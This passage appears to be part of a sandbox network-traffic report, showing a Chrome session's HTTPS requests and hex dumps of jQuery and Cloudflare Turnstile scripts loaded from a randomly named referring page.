                                                                                                                                                                                                                                                                            2024-12-03 17:58:48 UTC1369INData Raw: 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31
                                                                                                                                                                                                                                                                            Data Ascii: 39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,1


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            7192.168.2.449748104.18.95.414431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:47 UTC650OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                            Referer: https://j9lg.xbyhiqbjl.com/
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:58:48 UTC386INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:47 GMT
                                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                                                            cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                            location: /turnstile/v0/b/a6e12e96a2d5/api.js
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            CF-RAY: 8ec57265cf7641ef-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            8192.168.2.449749151.101.66.1374431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:47 UTC624OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                                                                                            Host: code.jquery.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                            Referer: https://j9lg.xbyhiqbjl.com/
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:58:48 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Content-Length: 89501
                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                                                                            ETag: "28feccc0-15d9d"
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Age: 1770260
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:48 GMT
                                                                                                                                                                                                                                                                            X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740028-EWR
                                                                                                                                                                                                                                                                            X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                            X-Cache-Hits: 2774, 0
                                                                                                                                                                                                                                                                            X-Timer: S1733248728.092582,VS0,VE1
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            2024-12-03 17:58:48 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                                                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                                                            2024-12-03 17:58:48 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                                                                                                                                                                            Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                                                                                                                                                                                            2024-12-03 17:58:48 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                                                                                                                                                                            Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                                                                                                                                                                                            2024-12-03 17:58:48 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                                                                                                                                                                                            Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                                                                                                                                                                                            2024-12-03 17:58:48 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                                                                                                                                                                                            Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                                                                                                                                                                                            2024-12-03 17:58:48 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                                                                                                                                                                                            Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            9192.168.2.449751104.18.95.414431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:49 UTC649OUTGET /turnstile/v0/b/a6e12e96a2d5/api.js HTTP/1.1
                                                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                            Referer: https://j9lg.xbyhiqbjl.com/
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:58:49 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:49 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                            Content-Length: 47695
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            accept-ranges: bytes
                                                                                                                                                                                                                                                                            last-modified: Thu, 21 Nov 2024 17:58:42 GMT
                                                                                                                                                                                                                                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            CF-RAY: 8ec57271186dc34b-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-03 17:58:49 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                                                                            Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                                                                                                                                                                                            2024-12-03 17:58:49 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                                                                                                                                                            Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                                                                                                                                                                            2024-12-03 17:58:49 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                                                                                                                                                                                            Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                                                                                                                                                                                                            2024-12-03 17:58:49 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                                                                                                                                                                                            Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                                                                                                                                                                                                            2024-12-03 17:58:49 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                                                                                                                                                                                                            Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                                                                                                                                                                                                            2024-12-03 17:58:49 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                                                                                                                                                                                                                            Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
